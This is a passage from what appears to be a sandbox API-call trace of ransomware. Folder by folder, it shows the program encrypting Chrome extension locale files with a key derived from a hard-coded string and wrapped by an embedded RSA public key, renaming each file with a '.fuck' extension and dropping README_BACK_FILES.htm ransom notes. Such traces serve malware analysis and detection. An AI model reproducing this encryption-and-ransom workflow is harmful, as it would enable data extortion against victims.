Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0249.324] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0249.325] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0249.326] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.326] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.326] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.326] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.326] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.326] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0249.326] AreFileApisANSI () returned 1 [0249.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.326] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.326] GetFileType (hFile=0x5d54) returned 0x1 [0249.326] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.328] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.328] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.328] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.328] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.328] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.328] GetLastError () returned 0x0 [0249.328] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json")) returned 0x20 [0249.328] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0249.329] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.329] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.330] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.331] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.333] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.333] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.333] CryptHashData (hHash=0x2938978, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.333] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.333] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.333] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.333] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293eff8) returned 1 [0249.333] CryptImportPublicKeyInfo (in: hCryptProv=0x293eff8, dwCertEncodingType=0x1, pInfo=0x2932860*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932890*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932898*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938138) returned 1 [0249.333] CryptEncrypt (in: hKey=0x2938138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.333] CryptEncrypt (in: hKey=0x2938138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e090*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e090*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.334] WriteFile (in: hFile=0x5d58, lpBuffer=0x293e090*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e090*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.334] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.335] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0249.335] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0249.335] CloseHandle (hObject=0x5d5c) returned 1 [0249.335] CloseHandle (hObject=0x5d58) returned 1 [0249.336] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0249.339] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0249.339] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0249.340] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0249.341] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.341] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.341] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.341] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.341] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.341] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0249.341] AreFileApisANSI () returned 1 [0249.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.342] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.342] GetFileType (hFile=0x5d54) returned 0x1 [0249.342] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.343] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.343] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.343] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.343] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.343] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.343] GetLastError () returned 0x0 [0249.343] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json")) returned 0x20 [0249.344] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0249.344] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.345] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.345] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.345] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.347] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.347] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.347] CryptHashData (hHash=0x2938978, pbData=0x28cb698, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.347] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.347] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.347] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.347] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e800) returned 1 [0249.348] CryptImportPublicKeyInfo (in: hCryptProv=0x293e800, dwCertEncodingType=0x1, pInfo=0x29322b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29322e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29322e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29382b8) returned 1 [0249.348] CryptEncrypt (in: hKey=0x29382b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.348] CryptEncrypt (in: hKey=0x29382b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f900*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f900*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.348] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293f900*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f900*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.349] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xcf, lpOverlapped=0x0) returned 1 [0249.350] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xcf, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.350] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.350] CloseHandle (hObject=0x5d58) returned 1 [0249.350] CloseHandle (hObject=0x5d5c) returned 1 [0249.350] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0249.353] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0249.353] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.gsg")) returned 1 [0249.354] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\messages.json.fuck")) returned 1 [0249.355] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.355] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.355] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.355] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.356] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.356] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0249.356] AreFileApisANSI () returned 1 [0249.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.356] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.356] GetFileType (hFile=0x5d54) returned 0x1 [0249.356] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.358] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.358] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.358] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.358] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.358] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.358] GetLastError () returned 0x0 [0249.358] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 